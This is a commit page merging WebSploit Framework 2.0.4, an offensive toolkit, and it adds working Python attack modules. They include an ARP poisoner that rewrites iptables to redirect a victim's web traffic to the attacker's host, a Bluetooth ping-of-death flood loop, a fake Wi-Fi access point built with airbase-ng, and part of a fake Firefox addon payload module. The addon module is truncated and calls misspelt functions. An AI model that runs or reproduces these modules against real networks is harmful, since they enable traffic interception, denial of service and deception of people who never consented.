Commit 0f27c697 authored by Mati's avatar Mati

Merge tag 'upstream/2.0.4'

Upstream version 2.0.4
parents 56109060 a2515e0d
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>wsf</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.python.pydev.PyDevBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.python.pydev.pythonNature</nature>
</natures>
</projectDescription>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<?eclipse-pydev version="1.0"?>
<pydev_project>
<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
<path>/wsf</path>
</pydev_pathproperty>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
</pydev_project>
......@@ -5,5 +5,6 @@ Licence For:
BackBox
BackTrack
BlackBuntu
Kali
And All Hacking And Security Distro
------------------
......@@ -21,11 +21,14 @@ Supported Attack :
# [+]MFOD Attack - Middle Finger Of Doom Attack
# [+]Java Applet Attack Vector
# [+]ARP DOS - ARP Cache Denial Of Service Attack With Random MAC
# [+]ARP Poisoner
# [+]Directory Scanner - Scan Target Directorys
# [+]Apache US - Scan Apache users
# [+]PHPMyAdmin - Scan PHPMyAdmin Login Page
# [+]Web Killer - Using From The TCPKill For Down Your WebSite On Network
# [+]Fake AP - Fake Access Point
# [+]FakeUpdate - Fake update attack
# [+]Wifi Jammer - Wifi Jammer Attack
# [+]Wifi Dos - Wifi Dos RQ Attack
# [+]Wifi Jammer - Wifi Jammer Attack
# [+]Wifi Dos - Wifi Dos RQ Attack
# [+]Wifi Honeypot
# [+]Bluetooth POD Attack
......@@ -46,4 +46,5 @@ def main_header():
if hdr_num ==3:
print header_3
......@@ -10,8 +10,8 @@ def main_info():
ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
print ""
print "\t\t--=" + ston + "WebSploit FrameWork"
print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.3" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "CyberTron" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "16" + wcolors.color.ENDC
print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.3-116 9.10.2012" + wcolors.color.ENDC + "]"
print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.4" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "MegaTron" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "19" + wcolors.color.ENDC
print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.4-111 13.6.2013" + wcolors.color.ENDC + "]"
print "\n\n"
......@@ -24,6 +24,7 @@ def modules_database():
print "network/webkiller\t\tTCP Kill Attack"
print "network/fakeupdate\t\tFake Update Attack Using DNS Spoof"
print "network/fakeap\t\t\tFake Access Point"
print "network/arp_poisoner\t\tArp Poisoner"
print "\n"
print (wcolors.color.BLUE + "Exploit Modules\t\t\tDescription" + wcolors.color.ENDC)
print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
......@@ -31,8 +32,10 @@ def modules_database():
print "exploit/browser_autopwn\t\tMetasploit Browser Autopwn Service"
print "exploit/java_applet\t\tJava Applet Attack (Using HTML)"
print "\n"
print (wcolors.color.BLUE + "Wireless Modules\t\tDescription" + wcolors.color.ENDC)
print (wcolors.color.BLUE + "Wireless / Bluetooth Modules\t\tDescription" + wcolors.color.ENDC)
print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
print "wifi/wifi_jammer\t\tWifi Jammer"
print "wifi/wifi_dos\t\t\tWifi Dos Attack"
print "wifi/wifi_honeypot\t\tWireless Honeypot(Fake AP)"
print "bluetooth/bluetooth_pod\t\tBluetooth Ping Of Death Attack"
print "\n"
......@@ -14,7 +14,7 @@ def upgrade():
try:
cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
res = cu.read()
if 'WebSploit Framework V.2.0.4' in res:
if 'WebSploit Framework V.2.0.5' in res:
print(wcolors.color.GREEN + "[*]New Version Available")
sleep(2)
print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
......
#!/usr/bin/env python
#
# WebSploit Framework ARP Poisoner module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import help
from core import wcolors
from scapy.all import *
from time import sleep
options = ["eth0", "192.168.1.1", "192.168.1.2", "192.168.1.3"]
def arp_poisoner():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP_Poisoner" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == 'set interface':
options[0] = com[14:20]
print "INTERFACE => ",options[0]
arp_poisoner()
elif com[0:10] == 'set router':
options[1] = com[11:26]
print "ROUTER => ", options[1]
arp_poisoner()
elif com[0:10] == 'set target':
options[2] = com[11:26]
print "TARGET => ", options[2]
arp_poisoner()
elif com[0:9] =='set lhost':
options[3] = com[10:25]
print "LHOST => ", options[3]
arp_poisoner()
elif com[0:2] =='os':
os.system(com[3:])
arp_poisoner()
elif com[0:4] =='help':
help.help()
arp_poisoner()
elif com[0:4] =='back':
pass
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
print "ROUTER\t\t"+options[1]+"\t\t\tyes\tRouter IP Address"
print "TARGET\t\t"+options[2]+"\t\t\tyes\tTarget IP Address"
print "LHOST\t\t"+options[3]+"\t\t\tyes\tLocal IP Address"
print ""
arp_poisoner()
elif com[0:3] =='run':
print (wcolors.color.BLUE + "[*]Setting Up ..." + wcolors.color.ENDC)
exec1 = "echo 1 > /proc/sys/net/ipv4/ip_forward"
exec2 = "echo 0 > /proc/sys/net/ipv4/conf/%s/send_redirects" % (options[0])
exec3 = "iptables --flush"
exec4 = "iptables --zero"
exec5 = "iptables --delete-chain"
exec6 = "iptables -F -t nat"
exec7 = "iptables --append FORWARD --in-interface %s --jump ACCEPT" % (options[0])
exec8 = "iptables --table nat --append POSTROUTING --out-interface %s --jump MASQUERADE" % (options[0])
exec9 = "iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination %s" % (options[3])
exec10= "iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination %s" % (options[3])
print(wcolors.color.BLUE + "[*]IP Forwarding ... " + wcolors.color.ENDC),
subprocess.Popen(exec1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(0.5)
print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
print(wcolors.color.BLUE + "[*]Configuring Iptables ... " + wcolors.color.ENDC),
subprocess.Popen(exec3, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec4, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec5, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec6, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec7, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec8, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(0.5)
print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
print(wcolors.color.BLUE + "[*]Redirect Traffic on %s ... " + wcolors.color.ENDC) % (options[3]),
subprocess.Popen(exec9, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(exec10, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(0.5)
print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
sleep(1)
print(wcolors.color.BLUE + "[*]ARP Poisoning Has Been Started ..." + wcolors.color.ENDC)
packet = ARP()
packet.psrc = options[1]
packet.pdst = options[2]
try:
while 1:
send(packet, verbose=0)
sleep(50)
except:
print (wcolors.color.RED + "[!]Something Wrong , Cannot Send Packet!")
pass
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
#!/usr/bin/env python
#
# WebSploit Framework Bluetooth Ping Of Death module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors
options = ["hci0", "", "600"]
def bluetooth_pod():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Bluetooth_POD" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] =='set interface':
options[0] = com[14:19]
print "interface => ", options[0]
bluetooth_pod()
elif com[0:10] =='set bdaddr':
options[1] = com[11:28]
print "bdaddr => ", options[1]
bluetooth_pod()
elif com[0:8] =='set size':
options[2] = com[9:12]
print "size => ", options[2]
bluetooth_pod()
elif com[0:2] =='os':
os.system(com[3:])
bluetooth_pod()
elif com[0:4] =='help':
help.help()
bluetooth_pod()
elif com[0:4] =='back':
pass
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "interface\t"+options[0]+"\t\t\t\tyes\tBluetooth Interface Name"
print "bdaddr\t\t"+options[1]+"\t\t\t\tyes\tTarget Bluetooth Address"
print "size\t\t"+options[2]+"\t\t\t\tyes\tSize of packets (Default 600)"
print ""
bluetooth_pod()
elif com[0:4] =='scan':
os.system("hcitool scan")
print ""
bluetooth_pod()
elif com[0:3] =='run':
print(wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
try:
for i in range(1, 10000):
xterm_1 = "xterm -e l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
os.system(xterm_1)
sleep(3)
except(KeyboardInterrupt, OSError):
print(wcolors.color.RED + "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit." + wcolors.color.ENDC)
bluetooth_pod()
else:
print "Wrong Command => ", com
bluetooth_pod()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
#!/usr/bin/env python
#
# WebSploit Framework Firefox Fake Addon module
# Created By 0x0ptim0us (Fardin Allahverdinazhand) | Mikili (Mikail Skandary)
# Email : 0x0ptim0us@Gmail.Com | Mikili.land@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors
options = ["eth0", "192.168.1.1", "0"]
def fake_addon():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Fake_Addon" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] =='set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
fake_addone()
elif com[0:9] =='set lhost':
options[1] = com[10:25]
print "LHOST => ", options[1]
fake_addon()
elif com[0:10] =='set target':
options[2] = com[11:12]
print "TARGET => ", options[2]
fake_addon()
elif com[0:2] =='os':
os.system(com[3:])
fake_addon()
elif com[0:4] =='help':
help.help()
fake_addon()
elif com[0:4] =='back':
pass
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "INTERFACE\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
print "LHOST\t\t"+options[1]+"\t\t\tyes\tLocal IP Address"
print "TARGET\t\t"+options[2]+"\t\t\t\tyes\tTarget ID (Select From List)"
print "\n"
print "Targets List:\n"
print "ID\t Description"
print "---\t-------------"
print "0\tGeneric (Java Payload)"
print "1\tWindows x86 (Native Payload)"
print "2\tLinux x86 (Native Payload)"
print "3\tMac OS X PPC (Native Payload)"
print "4\tMac OS X x86 (Native Payload)"
print "\n"
fale_addon()
elif com[0:3] =='run':
\ No newline at end of file
#!/usr/bin/env python
#
# WebSploit Framework Wifi Honeypot (Fake Access Point) module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import help
from core import wcolors
options = ["wlan0", "FreeNet", "9", "a1:a2:a3:a4:a5:a6", "/home/wh_logs.txt", "mon0", "1"]
def wifi_honeypot():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Honeypot" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == 'set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
wifi_honeypot()
elif com[0:9] == 'set essid':
options[1] = com[10:]
print "ESSID => ", options[1]
wifi_honeypot()
elif com[0:11] == 'set channel':
options[2] = com[12:13]
print "CHANNEL => ", options[2]
wifi_honeypot()
elif com[0:7] == 'set mac':
options[3] = com[8:25]
print "MAC => ", options[3]
wifi_honeypot()
elif com[0:10] == 'set output':
options[4] = com[11:]
print "OUTPUT => ", options[4]
wifi_honeypot()
elif com[0:7] == 'set mon':
options[5] = com[8:12]
print "MON => ", options[5]
wifi_honeypot()
elif com[0:11] =='set encrypt':
options[6] = com[12:13]
print "ENCRYPT => ", options[6]
wifi_honeypot()
elif com[0:2] =='os':
os.system(com[3:])
wifi_honeypot()
elif com[0:4] =='help':
help.help()
wifi_honeypot()
elif com[0:4] =='back':
pass
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
print "essid\t\t"+options[1]+"\t\t\t\tyes\tFakeAP Essid"
print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel"
print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address"
print "output\t\t"+options[4]+"\t\tyes\tLog File Location"
print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mode(default)"
print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions"
print "\n"
print "Numbers\t\t Encryptions"
print "-------\t\t--------------"
print "1\t\t Unencrypted"
print "2\t\t wep"
print "3\t\t wpa"
print "4\t\t wpa2"
print ""
wifi_honeypot()
elif com[0:3] == 'run':
comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm2= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm3= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -z 2 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm4= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -Z 4 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
monit_mod_start= "airmon-ng start %s" %(options[0])
print(wcolors.color.GREEN+"[*]Enable monitor mode on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC),
if options[6]=='1':
os.system(comm1)
elif options[6]=='2':
os.system(comm2)
elif options[6]=='3':
os.system(comm3)
elif options[6]=='4':
os.system(comm4)
sleep(2)
print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
wifi_honeypot()
elif com[0:4]=='stop':
monit_mod_stop="xterm -e airmon-ng stop %s"%(options[5])
os.system("killall xterm")
os.system("killall airbase-ng")
os.system(monit_mod_stop)
wifi_honeypot()
else:
print "Wrong Command => ", com
wifi_honeypot()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
......@@ -50,11 +50,14 @@ from modules import autopwn
from modules import mitm
from modules import mlitm
from modules import mfod
from modules import arp_poisoner
from modules import webkiller
from modules import brow_autopwn
from modules import java_applet
from modules import wifi_jammer
from modules import wifi_dos
from modules import wifi_honeypot
from modules import bluetooth_pod
from modules.fakeap import fake_ap
from modules.fakeupdate import fakeupdate
......@@ -103,6 +106,9 @@ def main():
elif terminal[4:18] =='network/fakeap':
fake_ap.fake_sts()
main()
elif terminal[4:24] =='network/arp_poisoner':
arp_poisoner.arp_poisoner()
main()
elif terminal[4:22] =='network/fakeupdate':
fakeupdate.fakeupdate()
main()
......@@ -112,6 +118,12 @@ def main():
elif terminal[4:17] =='wifi/wifi_dos':
wifi_dos.wifi_dos()
main()
elif terminal[4:22] =='wifi/wifi_honeypot':
wifi_honeypot.wifi_honeypot()
main()
elif terminal[4:27] =='bluetooth/bluetooth_pod':
bluetooth_pod.bluetooth_pod()
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment